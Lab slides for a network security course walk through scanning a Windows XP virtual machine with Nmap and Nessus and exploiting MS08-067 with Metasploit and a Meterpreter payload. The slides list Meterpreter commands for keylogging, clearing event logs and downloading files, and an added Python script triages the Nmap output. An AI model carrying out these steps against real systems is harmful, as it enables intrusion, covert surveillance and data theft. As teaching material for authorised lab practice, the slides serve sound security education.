Transcript
Page 1: Laboratory exercise - Network security - Penetration testing

Computer Network Security - Laboratory exercise

Adrian Furtună

M.Sc. C|EH

[email protected]

Page 2: Laboratory exercise - Network security - Penetration testing

Purpose of the exercise

Illustrating a computer attack using open-source tools: download locally the file secrets.txt located on the desktop of the victim machine by exploiting one of its vulnerabilities.

Going through the stages of an attack*:

1. Reconnaissance -

2. Scanning and enumeration - Nmap, Nessus

3. Gaining access - Metasploit

4. Privilege escalation -

5. Maintaining access -

6. Covering tracks and installing backdoors -

* according to the documentation for the Certified Ethical Hacker certification (EC-Council)

Page 3: Laboratory exercise - Network security - Penetration testing

Lab preparation (30 min)

Download and install the following tools:
nmap-5.00-setup.exe (http://nmap.org)
Nessus-4.0.2-i386.msi (http://www.nessus.org)
framework-3.3.3.exe (http://www.metasploit.org)

Update the Nessus plugins: "Obtain an activation code" (home feed), then "Register" (after registration the plugin update starts automatically)

Preparing the victim:
Download locally and unzip the archive: winxp_SP2_strip.zip
Start the virtual machine: Windows XP Professional.vmx
Log in: (user: user, pass: user)

Connectivity check (private network, Host <-> Guest): ping Host <-> Guest

Page 4: Laboratory exercise - Network security - Penetration testing

Disclaimer: Ethical Hacking / Penetration Testing

Actions similar to those of an attacker/hacker, but with an ethical purpose:

Discovering vulnerabilities
Proposing corrective measures
No destructive/unapproved actions
Proactive, preventive activity

Page 5: Laboratory exercise - Network security - Penetration testing

What we will practice...

1. Scanning with Nmap: open ports, versions of the exposed services, operating system version

2. Scanning with Nessus: automatic vulnerability search for the services found earlier

3. Exploiting a vulnerability using Metasploit: gaining access to the target system

Page 6: Laboratory exercise - Network security - Penetration testing

Target of the attack (the victim)

Operating system: ?????
Exposed services: ?????
Vulnerabilities: ?????
Virtual machine (VMware)
Firewall ON/OFF
No antivirus

Page 7: Laboratory exercise - Network security - Penetration testing

Scanning with Nmap (1)
http://insecure.org

nmap -h [excerpts]

HOST DISCOVERY:
  -sP: Ping Scan - go no further than determining if host is online
  -PN: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
  -F: Fast mode - Scan fewer ports than the default scan
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories
OS DETECTION:
  -O: Enable OS detection
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.

Page 8: Laboratory exercise - Network security - Penetration testing

Scanning with Nmap (2)

nmap -sS -sV -O -F -n 10.0.40.69

Page 9: Laboratory exercise - Network security - Penetration testing

Scanning with Nmap (2)

nmap -sS -sV -O -F -n 10.0.40.69

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time
Nmap scan report for 10.254.40.69
Host is up (0.00011s latency).
Not shown: 98 filtered ports
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:86:DF:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)
Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
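As an added example (not part of the lab slides), here is a small Python parser that turns a normal-format (-oN) Nmap report like the one above into structured data and applies a defender's triage rule: SMB reachable on a host that Nmap fingerprints as Windows XP is flagged for patch verification and firewall review. The sample report is constructed from the slide output, trimmed to two OS guesses.

```python
import re

# Constructed sample: the -oN report shown on the slide, trimmed to two OS guesses.
SAMPLE_REPORT = """\
Nmap scan report for 10.254.40.69
Host is up (0.00011s latency).
Not shown: 98 filtered ports
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:86:DF:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%)
No exact OS matches for host (test conditions non-ideal).
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")   # port/proto state service [version]
GUESS_RE = re.compile(r"([^,]+?) \((\d+)%\)")                       # "<os name> (NN%)" items


def parse_nmap_normal(text):
    """Parse one host's -oN report into: host, open ports, OS guesses, OS fingerprint reliability."""
    report = {"host": None, "ports": [], "os_guesses": [], "os_reliable": True}
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            report["host"] = line.split()[-1]
        elif (m := PORT_RE.match(line)):
            port, proto, state, service, version = m.groups()
            report["ports"].append({"port": int(port), "proto": proto, "state": state,
                                    "service": service, "version": version.strip()})
        elif line.startswith("Aggressive OS guesses: "):
            guesses = line[len("Aggressive OS guesses: "):]
            report["os_guesses"] = [(n.strip(), int(p)) for n, p in GUESS_RE.findall(guesses)]
        elif line.startswith("Warning: OSScan results may be unreliable"):
            report["os_reliable"] = False   # no closed port seen, so the OS guess is weak evidence
    return report


def triage(report):
    """Defender's rule: SMB (139/445) open on a host guessed to be Windows XP needs patch/firewall review."""
    findings = []
    smb = [p["port"] for p in report["ports"] if p["state"] == "open" and p["port"] in (139, 445)]
    top_os, conf = max(report["os_guesses"], key=lambda g: g[1], default=("unknown", 0))
    if smb and "Windows XP" in top_os:
        findings.append(f"SMB on {report['host']} ports {smb}; top OS guess '{top_os}' ({conf}%): "
                        "verify MS08-067 patch level and restrict SMB at the host firewall")
    if not report["os_reliable"]:
        findings.append("OS fingerprint unreliable (no closed port observed); confirm OS by other means")
    return findings
```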

Page 10: Laboratory exercise - Network security - Penetration testing

Scanning with Nessus (1)
http://www.nessus.org

Nessus Server Manager -> Start Nessus Server

Nessus Client -> Connect - the client connects to the server
+ Networks to scan - specify the IP of the target machine
+ Select a scan policy - create a new scan policy

Plugin Selection -> Disable All
Plugin Selection -> Windows (enable only the plugins for Windows)

Scan Now - starts the scan
Export - saves the resulting report

Page 11: Laboratory exercise - Network security - Penetration testing

Scanning with Nessus (2)
http://www.nessus.org

Page 12: Laboratory exercise - Network security - Penetration testing

Gaining access - Metasploit (1)
Metasploit architecture

Metasploit Console, Metasploit Web

Modules:
Exploits - exploit a vulnerability and deliver a payload
Auxiliaries - port scanning, dos, fuzzing, etc.
Payloads - encapsulate arbitrary code (shellcode) that is executed as a result of an exploit
Nops - generate NOP instructions of arbitrary size

Tutorial: http://www.offensive-security.com/metasploit-unleashed/

Page 13: Laboratory exercise - Network security - Penetration testing

Gaining access - Metasploit (2)
http://www.metasploit.org

We exploit the ms08-067 vulnerability (Conficker/Kido/Downadup)
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Start Metasploit Web

Exploits -> Search [ms08-067]

Set TARGET - Windows XP SP2 English

Set PAYLOAD - windows/meterpreter/bind_tcp (or reverse_tcp)

Set OPTIONS - RHOST (the victim's IP address)

Exploit

Page 14: Laboratory exercise - Network security - Penetration testing

Gaining access - Metasploit (3)
http://www.metasploit.org

Page 15: Laboratory exercise - Network security - Penetration testing

Gaining access - Metasploit (4)
http://www.metasploit.org

Meterpreter help [excerpts]

Stdapi: File system Commands
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory

Stdapi: System Commands
    Command       Description
    -------       -----------
    clearev       Clear the event log
    execute       Execute a command
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
    Command        Description
    -------        -----------
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes

Page 16: Laboratory exercise - Network security - Penetration testing

Achieving the exercise objective

Download locally the file secrets.txt located on the desktop of the victim machine by exploiting one of its vulnerabilities.

Meterpreter:

pwd

cd Desktop

ls

download

Page 17: Laboratory exercise - Network security - Penetration testing

The End

Thank you!

Adrian Furtună
M.Sc. C|EH
[email protected]

? QUESTIONS ?

